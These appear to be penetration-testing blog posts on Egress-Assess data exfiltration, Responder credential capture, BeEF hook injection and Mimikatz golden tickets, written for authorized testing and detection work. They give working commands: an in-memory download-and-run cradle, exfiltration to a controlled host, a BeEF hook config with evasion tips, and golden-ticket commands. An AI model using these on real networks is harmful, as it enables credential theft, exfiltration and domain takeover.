Egress-Assess and Owning File Data Exfiltration

Since its creation, Egress-Assess's primary use case has been to generate faux data, such as social security numbers, and attempt to exfiltrate that data over a variety of different protocols.  It is useful both for pen testers and for blue teamers who are trying to gauge whether or not their organization can detect sensitive data egressing the network boundary.  Data loss can have a huge impact on customers; just read about any major breach in the past 12 months.  Social security and credit card numbers are great for a quick demo, but sometimes real data is needed to demonstrate impact.  Both Steve (@424f424f) and I recognize this, and we're happy to say we've added the ability to exfiltrate real files with Egress-Assess.

Why did this feature get added?  Because our threats are doing this.  Hacking into companies isn't just about getting shells anymore; attackers are breaking into companies to steal their data.  This threat is real, and as professional pen testers/red teamers we should be emulating the threats our customers are facing.  Evolving our tradecraft to include data exfiltration testing directly adds value for our customers.  When we can point to the fact that 7 gigs of credit card numbers were exfiltrated from our customer's network and not a single one was detected, we can show exactly where they need to improve.

As you can see, Egress-Assess now supports a --file option (in PowerShell, pass -Datatype with the path to a file):

EA Help with File

Nearly all modules currently support file transfers.  The only module which still requires an update is the dns_resolved module; the straight dns module does support file transfers, as do DNS transfers in PowerShell.  The difference between the two is that dns_resolved uses recursive lookups to transfer file data, while straight dns points DNS packets directly at the DNS/Egress-Assess server you specify.

DNS file transfers automatically attempt to use the maximum size allowable within a DNS packet to transfer files.  You may see the total packet count change mid-transfer; this is Egress-Assess adjusting the amount of data sent in each packet to remain protocol compliant.  DNS file transfers in Egress-Assess use the following logic (a rough code sketch follows the lists below):

  1. While there is data to send, continue sending data
  2. Each packet is sent with the packet number, a delimiter (".:|:."), and then file data.  All of this information is base64 encoded.
  3. The server receives the packet, ensures it matches the above layout, and then responds with the packet number that was received, and the string “allgoodhere”.
  4. If the client/sender receives the response packet, it moves on to sending the next packet.  If no response is received within 2 seconds, it retransmits.

Sending file data

Once there is no more data to send, the sender:

  1. Sends a DNS TXT packet with the string “ENDTHISFILETRANSMISSIONEGRESSASSESS” which is concatenated with the name of the file that is being transferred.
  2. The server receives the end packet, and writes out the data received throughout the transmission, in order, to the filename received in the end transmission packet.

EOF
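To make the framing concrete, below is a rough, hypothetical sketch of the client-side loop described above.  The delimiter, end marker, ack string, and retransmit-on-timeout behavior come straight from the steps listed; the chunk size, function names, and the send_txt_query transport stub are assumptions, not the actual Egress-Assess code.

import base64

DELIMITER = ".:|:."
END_MARKER = "ENDTHISFILETRANSMISSIONEGRESSASSESS"

def send_file(file_bytes, filename, send_txt_query, chunk_size=150):
    # send_txt_query(payload) stands in for the real DNS TXT query/response
    # round trip; it should return the server's reply as a string, or None
    # if nothing comes back within the two-second timeout.
    packet_number = 1
    offset = 0
    while offset < len(file_bytes):                    # 1. keep sending while data remains
        chunk = file_bytes[offset:offset + chunk_size]
        payload = base64.b64encode(                    # 2. number + delimiter + data, base64 encoded
            str(packet_number).encode() + DELIMITER.encode() + chunk)
        reply = send_txt_query(payload)
        if reply and "allgoodhere" in reply:           # 3./4. acked, move to the next chunk
            packet_number += 1
            offset += chunk_size
        # otherwise loop around and retransmit the same chunk
    # End of transfer: tell the server which filename to write the data to
    # (whether the real tool encodes this final packet the same way is an assumption)
    send_txt_query((END_MARKER + filename).encode())

The real client also resizes its chunks on the fly to stay within DNS limits, which is why the total packet count can change mid-transfer.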

We developed the client and server to speak in this manner to ensure that all data is received and written out in the proper order.  A quick md5sum test shows that we have, in fact, recreated on the server the exact same file that was sent over DNS.

MD5 Sum Files

I hope this helps explain DNS transfers, and everything in this latest release of Egress-Assess.  If anyone has any questions, feel free to hit me (@ChrisTruncer) or Steve (@424f424f) up on twitter or in #Veil on freenode!

Hasher Re-Write/Update

Github Repo: https://github.com/ChrisTruncer/Hasher

I have made some changes to Hasher, hopefully for the better.  Hasher was originally a single, large Python script used to hash plaintext strings and to compare a hash value against a plaintext string.  Hasher still performs the same actions, generating hashes or comparing them with a plaintext string, but it has now been converted into a framework which allows me, or anyone else, to easily add support for different hash types.

Usage is still essentially the same; however, there is no longer an interactive menu.  Hasher is now completely command-line based.

Hasher Menu

To see a list of all hash types that Hasher currently supports, simply run ./Hasher.py --list

HashTypes

Once you know the hash type you want, generating a hash is fairly simple.  For example, if you were looking to generate (-G) an MD5 hash for the string "password123", you would do it this way:

./Hasher.py -G --plaintext password123 --hash-type md5

You should see output similar to the following:

MD5 Generated

Harmj0y gave me a great idea for Hasher.  He had a use case where he just wanted Hasher to dump out all possible hashes for a specific plaintext string, without having to generate each hash manually.  I added the ability to generate every supported hash type from the information provided.  To do this, you would run the following command:

./Hasher.py --plaintext password123 --hash-type all -G

When you run this, you should see output similar to the following:

Hasher All Output

Another capability Hasher has is that it can take a plaintext string and a hash, and then compare (-C) the plaintext string against the hash to ensure they match.  This has been useful for me when I need to check whether a hash and a string "equal" each other without submitting any of the information online.  So, let's continue the previous example.  If you wanted to verify that the plaintext string "password123" matches the MD5 hash "482c811da5d5b4bc6d497ffa98491e38", your command would look like this:

./Hasher.py -C --plaintext password123 --hash 482c811da5d5b4bc6d497ffa98491e38 --hash-type md5

True Comparison

For testing purposes, if the hash and plaintext string didn’t match up, it would look like the following:

False Hasher Comparison

 

Hash Module Development

Adding support for new hash types is significantly easier now.  Every *.py file within the "hash_ops" folder is automatically picked up and parsed by Hasher.  Within the hash_ops folder is a text file called "hash_template.txt".  To add a new hash type, simply copy the template file and rename it with a .py extension.  There are only two required methods within each module:

  • __init__ – This method needs to contain a self.hash_type attribute.  This is what the user specifies on the command line to select a specific hash.  Any other information within the __init__ method is optional.
  • generate – The generate method is called by Hasher to generate a hash.  This method has complete access to all options passed in from the command line by the user.  It must return the hash of the plaintext string.

For a sample, this is what the md5 module looks like:

Hasher MD5 Updated
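In case the screenshot doesn't come through, here is a minimal sketch of what such a module could look like.  The required self.hash_type attribute and generate method come from the list above; the class name, constructor signature, and the cli_options.plaintext attribute are assumptions rather than the exact code from the repository.

import hashlib

class HashModule:

    def __init__(self, cli_options=None):
        # Required: the value the user passes with --hash-type to select this module
        self.hash_type = "md5"

    def generate(self, cli_options):
        # Required: has access to the parsed command line options and must
        # return the hash of the supplied plaintext string
        return hashlib.md5(cli_options.plaintext.encode()).hexdigest()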

Hopefully, this helps explain the minor usability changes to Hasher, and elaborates on how it’s now easier to add support for new hashes.  If anyone has any questions, feel free to reach out to me on twitter (@ChrisTruncer) or in #Veil on Freenode!

Exfiltrate Data via DNS with Egress-Assess

Egress-Assess Repo: https://github.com/ChrisTruncer/Egress-Assess

DNS is a channel that can usually be used to exfiltrate data out of a network.  Even when the network you are operating in requires authenticating to a proxy for data to leave, users can typically still make DNS requests, which are forwarded on via the local DNS servers in the user's network.  An attacker can use normal DNS functionality to forward data, C2, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for use in Beacon with Cobalt Strike.

A new module has been added to Egress-Assess that allows you to use your network's own DNS servers to exfiltrate data.  This is different from the existing DNS module within Egress-Assess: the existing module sends DNS packets directly to the DNS server you specify, whereas the "dns_resolved" module relies on your network's own DNS servers to resolve and forward the requests.

Utilizing the existing network's DNS servers requires some setup.  Raphael also has a blog post describing virtually the same configuration that is required to exfiltrate your data.

The first step I took was to create an A record for egress.christophertruncer.com and point it at the server that will act as the endpoint for the data I am exfiltrating.  Next, I created an NS record for the subdomain I will use for exfiltrating data, and pointed the NS record at the A record I just created (egress.christophertruncer.com).  My setup looks like the following:

DNS NS Record
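For reference, the two records roughly equate to the following hypothetical zone entries (the IP address is a placeholder, and the exact syntax depends on your DNS provider):

egress.christophertruncer.com.  IN  A   203.0.113.10
test.christophertruncer.com.    IN  NS  egress.christophertruncer.com.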

Now, everything is set up and ready to go!  To use this, my sample Egress-Assess command would be:

./Egress-Assess --client dns_resolved --datatype ssn --ip test.christophertruncer.com

Since egress.christophertruncer.com acts as the nameserver for test.christophertruncer.com, all requests using the “test” subdomain are sent to egress, sending all data over DNS to an endpoint I control.

If you have any questions on this, feel free to shoot a tweet my way or hop in #veil on Freenode!

How to Develop Egress-Assess Modules

This post will document how to create server, client, and datatype modules for Egress-Assess.  I’ll document the necessary functions and attributes that the framework requires, and hopefully try to give some helpful info.

Some basic info before diving into the specifics of each module type: all __init__ methods are able to access any command line parameter passed in by the user.  If a module requires information from the command line (hint: they all do in one way or another), you should declare attributes (based on the command line options) for each class instance within the __init__ method.

All of the module templates are currently .txt files.  Once you've created your module and want to test/use it, rename it to a .py file within its respective folder.

Server Modules

Server module template

The first module type to discuss is the server module.  These modules allow the framework to be put into a "server mode", which typically entails listening and waiting for the client to connect and transmit data to the server.  A blank server module template is available at this link to use as a base for creating a server module.

The self.protocol attribute is the only required attribute for server modules.  This attribute is what is displayed to the user when typing --list-servers.  This is also the value that is used to identify and use the server module when used in conjunction with the --server flag.

The serve function is the only required function for the server class.  It is what the framework uses to start the server.  You can create as many other functions as needed for the server class, but the serve function should be considered the "main" of the server module.
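As a rough illustration (not a module from the repository), a stripped-down server module might look like the following.  Only self.protocol and serve() are the documented requirements; the class name, constructor signature, and the bare TCP listener are assumptions.

import socket

class Server:

    def __init__(self, cli_options):
        # Required: the name shown by --list-servers and matched by --server
        self.protocol = "exampletcp"
        # Store anything you need from the command line options here
        self.listen_ip = getattr(cli_options, "ip", None) or "0.0.0.0"

    def serve(self):
        # Required: the framework calls this to start the server; treat it as "main"
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind((self.listen_ip, 8080))
        listener.listen(1)
        conn, addr = listener.accept()
        data = conn.recv(65535)
        print("[*] Received %d bytes from %s" % (len(data), addr[0]))
        conn.close()
        listener.close()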

Client Modules

Client module template

The client module will typically be used to transmit data over a specific protocol, rather than receive any data.  A blank client module template can be found at this location.

The self.protocol attribute is the only required attribute for client modules.  This attribute is what is displayed to the user when typing --list-clients.  This is also the value used to identify and select the client module when used in conjunction with the --client flag.

The transmit function is the only required function for client modules.  It is the function called by the framework to transmit data.  The transmit function has a variable passed into it (data_to_transmit), which is the data the client is supposed to transmit to the server.  Similar to server modules, the transmit function should be considered the "main" function of the client module.  You can create as many additional functions as necessary for the client module's use, but the transmit function is what will be invoked by the framework.
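A matching client module sketch under the same caveats: only self.protocol and transmit(data_to_transmit) are the documented requirements, and everything else here is illustrative.

import socket

class Client:

    def __init__(self, cli_options):
        # Required: the name shown by --list-clients and matched by --client
        self.protocol = "exampletcp"
        self.remote_ip = getattr(cli_options, "ip", None) or "127.0.0.1"

    def transmit(self, data_to_transmit):
        # Required: the framework hands in the generated data to send
        if isinstance(data_to_transmit, str):
            data_to_transmit = data_to_transmit.encode()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self.remote_ip, 8080))
        sock.sendall(data_to_transmit)
        sock.close()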

Datatype Modules

Datatype module template

The datatype module is used to generate any sort of data.  Currently, there’s support for modules that generate social security numbers or credit card numbers.  A blank datatype template can be found at this location.

The self.cli, self.description, and self.filetype attributes are required for datatype modules.  The self.cli attribute is part of what is displayed when the user types --list-datatypes and is what uniquely selects the specific datatype with the --datatype flag.  It should be short, since it is what the user passes in on the command line.

The self.description attribute can be used to better describe the datatype that is generated by the module.  This is also displayed when a user types --list-datatypes.  For example, the credit card module has “cc” as the self.cli attribute and “Credit Card Numbers” as the self.description attribute.

The self.filetype attribute is currently only used when attempting to exfil data over FTP, but it is required.  It lets the framework know whether the data is text or binary.  If the data is text, keep the filetype attribute set to "text"; otherwise, change it.

The generate_data function is a required function for datatype modules.  It is what the framework invokes to generate the specific type of data requested by the user, and it must return the total "data" generated.  As an example, the social security number datatype module generates the requested number of social security numbers, and they are returned to the framework at the conclusion of the generate_data function.
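And a hypothetical datatype module using the three required attributes and generate_data described above; the class name, record count, and generation logic are made up for illustration.

import random

class Datatype:

    def __init__(self, cli_options=None):
        # Required attributes
        self.cli = "fakessn"                                # selected with --datatype
        self.description = "Fake Social Security Numbers"   # shown by --list-datatypes
        self.filetype = "text"                              # text data, not binary

    def generate_data(self):
        # Required: build the data and return all of it to the framework
        records = []
        for _ in range(1000):
            records.append("%03d-%02d-%04d" % (
                random.randint(1, 999), random.randint(1, 99), random.randint(1, 9999)))
        return "\n".join(records)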

Helper Functions

There are a few helper functions accessible to all modules.  They live in the helpers.py file within the framework.  A brief description of each (a tiny usage sketch follows the list):

  • helpers.randomNumbers(X) – returns "X" random numbers
  • helpers.ea_path() – returns the current path that Egress-Assess is running from
  • helpers.writeout_text_data(incoming_data) – writes out a file containing the data passed into the function, and returns the name of the file
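As a purely hypothetical usage example from inside a module (the import path is an assumption, so check where helpers.py actually lives in the framework, and I have not pinned down the exact return types):

from common import helpers                           # assumed import path

digits = helpers.randomNumbers(9)                    # nine random numbers
out_file = helpers.writeout_text_data(str(digits))   # write the data out, get the filename back
print(helpers.ea_path(), out_file)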

 

I hope this helps explain how to write any of the currently available modules.  If anyone has any questions, feel free to hit me up on twitter or on IRC in #veil!

Egress-Assess in Action via Powershell

For a week or two now, rvrsh3ll (@424f424f) has been working on a PowerShell client for Egress-Assess that allows Windows users to simply load the script in memory and use it to test egress filters.  As of yesterday evening, his script has been merged into Egress-Assess and is now available in the Github repository.

@424f424f went one step further and sent over some screenshots demonstrating potential detections when sending data outside of his network.  But first, let's demo the PowerShell script.

Loading the PowerShell script is easy and doesn't require placing any file on disk.  To do this, the Windows machine will need internet access.  Start PowerShell on the Windows machine you want to run Egress-Assess from, and use the following command to load the script into memory:

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/ChrisTruncer/Egress-Assess/master/Invoke-EgressAssess.ps1')

In-Memory Download EA

Now the PowerShell script is in memory and ready for use!  Usage is nearly identical to the Python client.  To send data to another system running Egress-Assess (here over HTTPS), you can use the following command:

Invoke-EgressAssess -client https -datatype cc -Verbose -ip 192.168.63.149

EA Powershell https

On the server side, we can see that the data is received.

Server received powershell http

@424f424f has a Snorby instance in use and ran Egress-Assess traffic through it.  The following are some of the alerts that were generated (you'd hope similar alerts fire for your clients!).

Snorby alerts: credit cards and social security numbers

If anyone has any questions on the usage, be sure to hit me up.  Otherwise, a big thanks again to Rvrsh3ll (@424f424f) for sending this awesome addition.

Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers with data exfiltration testing as a service.  Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate whether their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy-to-use solution that would simulate the extraction of sensitive data from my machine to another.  While planning out the tool, I targeted a few protocols commonly used by attackers: FTP, HTTP, and HTTPS.  To ensure that I could generate "sensitive" data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value.  Two sensitive data types likely to have signatures across organizations are social security numbers and credit card numbers, so I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server, where data would be passed over network boundaries.  Once the repository is cloned on both machines, the dummy data can be transferred from one machine to the other.

To extract data over FTP, you first start Egress-Assess's FTP server by placing it in server mode with the ftp option and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running.  With this going, all we need to do now is configure the client to connect to the server!  This is simple, and can be done by telling Egress-Assess to act in client mode and use ftp, providing the username and password to use, the IP to connect to, and the datatype to transmit (in this case, social security numbers).  Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

FTP client updated

Within the same directory as Egress-Assess, a "data" directory will be created; this is where all transmitted files are stored.  At this point, the transfer is complete via FTP!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will start a web server listening on port 80.  The next step is to have your client generate new dummy data and send it to the web server.  Only this time, we'll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the "--data-size" flag.  If we want to send approximately 15 megabytes of credit card data to our web server over HTTP, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess.  Future revisions will include making the tool more modular so users can easily add support for new protocols and new data types for transfer.  If there are any other requests, I'd love to hear them!

Getting Hooked up with Responder and Beef

Responder is a really effective tool that I've written about before, which can be used to easily obtain user credentials on a network.  In Responder's 2.0 release, however, the ability to perform HTML injection attacks was added to the tool.  This capability can be easily leveraged to perform a variety of nefarious actions against our targets.  The first tool I thought of pairing with Responder's HTML injection capability is BeEF.  BeEF is described as a browser exploitation framework.  The goal of an attacker utilizing BeEF is to "hook" another user's browser.  Once hooked, BeEF contains a large number of modules that can be used to attack the victim's web browser (I would be doing it a disservice if I tried to describe all of BeEF's capabilities in a single post).  So the attack that I'm going to demonstrate uses Responder's ability to inject HTML to hook systems on the network I am targeting with BeEF.

Edit: @Antisnatchor provided some really good feedback in the comments.  I think it's worth everyone reading what he said, so it is copied here:

“Few things to add, change the following in the main config.yaml config file:

– reduce xhr_poll_timeout to 500 (milliseconds), so polling will happen twice a second
– change hook_file to jquery.js or something different to change the hook name (more stealthy), as well as hook_session_name and session_cookie_name to different values.
– enable the Evasion extension, just use ‘scramble’ + ‘minify’ as obfuscation techniques. This will minify/pack JS and scramble variables like BeEF/beef to random ones.
– change default BeEF credentials and web_ui_basepath

I would also add the BeEF hook tag in rather than .

Then once it’s up, you can automate module lanching to multiple hooked browser based on fingerprinting results via the RESTful API.” 

First, you're going to need to get BeEF started on your attacking platform.  If you're using Kali, it's located within the /usr/share/beef-xss directory.  Once within it, simply type "./beef" and wait as the framework starts up.  Your console should look similar to the following once it is ready to go:

Beef startup

Next up, we need to slightly modify Responder's config file.  If you haven't already, clone the project to your attacking platform, and then open Responder.conf in a text editor.  Within the Responder.conf file you're going to want to change the "HTMLToServe" value.  To carry out the attack, we want to inject BeEF's javascript file used to hook browsers.  I just changed the value to be:

HTMLToServe = <html><head></head><body><script src="http://192.168.63.149:3000/hook.js" type="text/javascript"></script></body></html>

Your config should look similar to the following now:

Responder Config

With this added in, Responder will inject the javascript containing our BeEF hook into any page that it is able to.  First, I need to start Responder.  The options that I am passing into Responder tell it to listen on my local IP, stand up a rogue WPAD proxy, and display verbose messages.

Start Responder

With both BeEF and Responder up and running, it's time to get our hooks!  To test this out, I'm going to have the web browser on my Windows 7 victim VM attempt to navigate to http://intranet/.  When it requests the web page, Responder will serve one up.  In my case, I don't have an actual machine called "intranet" within my lab network, so Responder will just serve up a page containing only the BeEF hook code.

Web-Requested

Not only did Responder see the web request, it was also able to obtain the NTLMv2 hash used by the current user, "sonofflynn".  If I look at the web page on my Windows 7 VM, it just shows a blank page.  However, the blank page has also loaded my BeEF hook, and after logging into the BeEF console, I can see the browser has successfully been hooked.  With our victim's browser hooked, we can now perform a wide variety of enumeration and attacks against or through the victim's browser.  I highly recommend reviewing the large number of posts that cover BeEF and the variety of attacks it contains.

Beef Hooked

At times, I have had Responder act "funny" by serving up what appears to be random ASCII rather than an actual website, and I have also had occasional issues with it injecting the HTML code.  However, the setup above works best for me to get repeatable results and hooks.  If there's something that I've missed, or a better way to inject HTML code/BeEF hooks/etc., I'd love to hear about it and learn a better way (or maybe the right way :)).  Otherwise, I hope this helps, and feel free to hit me up with any questions!

Responder & User Account Credentials – First Come, First Served

Responder is an awesome tool created by Laurent Gaffie that can be extremely effective on pen tests.  I recently had the opportunity to use Responder, and it returned valid domain credentials within about 10 minutes.  I wanted to write this post to document what worked for me.  With that said, Larry Spohn also wrote an excellent blog post on essentially the same attack, which can be viewed here, so be sure to check that post out as well!

Responder can return results in two different ways.  We can try to capture NTLM challenge/response hashes from workstations, or Responder can return credentials via basic authentication.  Ideally, the easiest for an attacker to work with is basic authentication, since the credentials are only base64 encoded and are therefore trivially reversible.
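To illustrate just how reversible basic auth is, here is a quick Python snippet using the example credentials that show up later in this post; the header value is computed on the fly rather than copied from a real capture.

import base64

# What a browser sends after "Authorization: Basic " is just base64("username:password")
header_value = base64.b64encode(b"testuser:badpassword").decode()
print(header_value)                             # the value seen on the wire
print(base64.b64decode(header_value).decode())  # -> testuser:badpassword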

The specific weakness being attacked here is that, by default, workstations are configured to automatically detect proxy settings for the network they are operating on.  When a workstation attempts to find the proxy settings, it first requests "WPAD" over DHCP.  If the workstation doesn't receive a response, it then makes multiple DNS requests.  If DNS also doesn't return any results, the workstation finally falls back to requesting over NetBIOS (source).  If configured to do so, Responder can act as a rogue WPAD proxy.  Responder can then serve a PAC file (configured as you see fit) and attempt to proxy all connections through itself.

One trick Responder can do (if configured to do so) is respond to HTTP requests from workstations that are attempting to access local resources (such as http://intranetsite).  The nifty aspect of this trick is that, to the user, the pop-up appears as a normal-looking authentication box prompting them to enter their credentials.  Once entered, the credentials are transferred to the attacker, base64 decoded, and displayed.  So that's the background to this attack; let's check it out.

First, we're going to need to configure how Responder will operate on the network.  We're going to pass it a couple of command line options (an example invocation follows the list):

  • -i <IP Address or network interface> – The IP address to listen on
  • --wpad – Tells Responder to start a "rogue" wpad proxy server
  • -b – Tells Responder to return Basic Authentication information vs. NTLM
  • -F – Tells Responder to force NTLM or Basic authentication from any machine attempting to access the wpad file
  • -f – Tells Responder to fingerprint the host
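Assembling the options from the list above, a sample invocation might look like the line below.  The IP address is just an example from my lab, and flag syntax has changed between Responder releases (some older builds expected On/Off values after these switches), so check ./Responder.py -h for the version you're running:

./Responder.py -i 192.168.63.149 --wpad -b -F -f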

Starting Responder

As you can see, Responder is pretty simple to set up and get running.  Once the previous command has been run, you should see something similar to the following:

Responder Started

This is roughly what Responder is going to look like once it is up and running.  For now, you can sit and wait for information to start coming in.  A good time to utilize Responder is when you’re first getting started on an assessment.  Responder can be one of the first tools you get running, and you can just leave it be and check back in on the results later.

Once Responder has been running for a while, check whether any juicy information has been returned to us!  Below is what your output will likely look like:

Responder Output

What's awesome to see here is the "HTTP-User & Password:" line!  We can see the username "testuser" and password "badpassword" were returned to us, so we now have our first set of user credentials!  From the user's perspective, this is what the popup looked like on a Windows 8.1 desktop:

WPAD Desktop

This is a fairly typical screen and users are *LIKELY* going to enter their account information without a second thought.

At any point, you can stop running Responder, and it will have logged all credential information into a file for viewing.  In my case, this is what I have on my attacker platform:

Responder Loot File

If the same user were to keep entering their username and password, there would be duplicate (or more) entries of the credentials within the loot file.

Responder is an extremely powerful tool that can be used to quickly grab credentials when plugged into a network segment that users are also operating on.  I highly recommend using it as it can be a great way to get an initial foothold into your target network.

Mimikatz, Kiwi, and Golden Ticket Generation

First off, I want to state that the purpose of writing this post is to help myself learn how to use Golden Tickets on assessments.  If you want to see some great write-ups about Golden ticket generation, be sure to look at these:

Those posts are significantly more authoritative on the subject than mine, I just wanted to write this out so I can reference this on assessments.

Golden tickets offer an extremely powerful way for an attacker to escalate privileges on a network, or to obtain access to resources which are only available to a select group.  However, it's absolutely worth mentioning that with this great power, pen testers need to take extra precautions to protect any golden tickets that they've created.  It's highly recommended that any ticket you create be securely encrypted during your assessment, and securely deleted when it is no longer needed.

Golden tickets can be generated in two different ways.  The first is through the kiwi extension in Metasploit, and the other is through the standalone Mimikatz application.  This post will show how to use both options to generate your ticket.  Let's start off with Metasploit's kiwi extension.

At this point, I am going to assume that you have a meterpreter session, as SYSTEM, on the domain controller for the domain you are targeting.  Within your session, you want to load the kiwi extension by typing:

load kiwi

Load Kiwi

Now that the kiwi extension is loaded, typing help should show the additional commands that are available to you.  The command that we're interested in is golden_ticket_create.  In order to create the golden ticket, we're going to need at least four pieces of information (tickets can be further customized with additional information, but the generation process needs a minimum of four):

  • The Domain Name
  • The Domain SID
  • The krbtgt account’s nt hash
  • The user account you want to create the ticket for

MSF Golden Ticket Create

To get this information, you can just interact with the meterpreter session you already have active.  Drop into a shell, and run:

whoami /user

Domain Sid

The domain SID starts at the S-1… and goes to …70370 (it is the user's SID with the final RID component dropped).  Copy and paste that information into a text file.  Next up, grab the domain name.  One way I like to do this is by running:

ipconfig /all

Find Domain Name

In this case, I can see (and I know) the domain name is PwnNOwn.com, so this info should also be saved off to a text file.  The last piece of information you will need is the NT hash of the krbtgt account.  Since you should be on the DC, perform a hashdump and grab the krbtgt hash.
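If you're not sure which line to grab from the hashdump output, each entry follows the username:RID:LM hash:NT hash::: layout.  The line below is a mock-up for illustration only; the LM field shown is the well-known "blank" LM value, and the NT hash is a placeholder:

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<krbtgt nt hash>:::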

Now that we have all of the required information, we can generate a golden ticket!  At this point, go ahead and determine the user account you want to impersonate; you can even use an account that doesn't exist.  Now it's just a matter of getting everything in place for the command.  In our case, the command looks like this:

golden_ticket_create -d PwnNOwn.com -k <nthash partially redacted> -s S-1-5-21-522332750-710551914-1837870370 -u invaliduser -t /root/Downloads/invaliduser.tck

MSF Ticket Created

We can see from the previous picture that the ticket was successfully created and written out.  The user that we are impersonating is “invaliduser”, and the ticket is saved to /root/Downloads/invaliduser.tck.

Now that the ticket has been created, it’s time to apply it to our current session.  To do this you want to type the following command:

kerberos_ticket_use /root/Downloads/invaliduser.tck

Ticket applied

In the above screenshot, I cleared all existing tickets, then applied the created ticket, and then we can see the golden ticket in use.  Note: you don’t have to purge existing tickets, but I did for demonstration purposes.

Now that the ticket has been applied, a low level user account can now act as a Domain Administrator:

MSF Ticket Applied

The user account could not previously access the DC’s C$ share, but with the ticket applied, it can!  We’re now operating with the same level of permissions as a DA!

 

Our other option for generating and using golden tickets is the standalone mimikatz binary, which you can download from here.  Once downloaded, navigate to the mimikatz binary and start it.  We can re-use the information we already have to generate our golden ticket.  To generate the ticket, you're going to run a command similar to the following:

kerberos::golden /user:invaliduser2 /domain:PwnNOwn.com /sid:S-1-5-21-522332750-710551914-1837870370 /krbtgt:<ticket partially redacted> /ticket:invalidadmin.tck /groups:501,502,513,512,520,518,519

(Thanks to Benjamin Delpy (@gentilkiwi) for letting me know that I failed at redacting my own krbtgt hash, haha.  This is why you should always post things from a test/lab domain :).  Pic below is now updated)

Ticket created (Windows)

 

In this case, we're creating a ticket for a nonexistent user account, the User ID is left at its default value (500), and we've added the groups that the user should be part of.  The ticket is saved to the invalidadmin.tck file within the same directory that the mimikatz binary is running from.

Now that the ticket has been created, we just need to apply it with Mimikatz.  This can be done by running the following command:

kerberos::ptt invalidadmin.tck

Win Ticket Submission

And to verify that we have administrative access to the domain controller again…

Access DC Share

We can actually also see from the DC that the Logon was successful, even though it was with an account that doesn’t exist within the domain!

Windows Log

And that’s about it!  Writing this out helped me gain a better understanding about generating and using golden tickets, hope that it can help someone else too!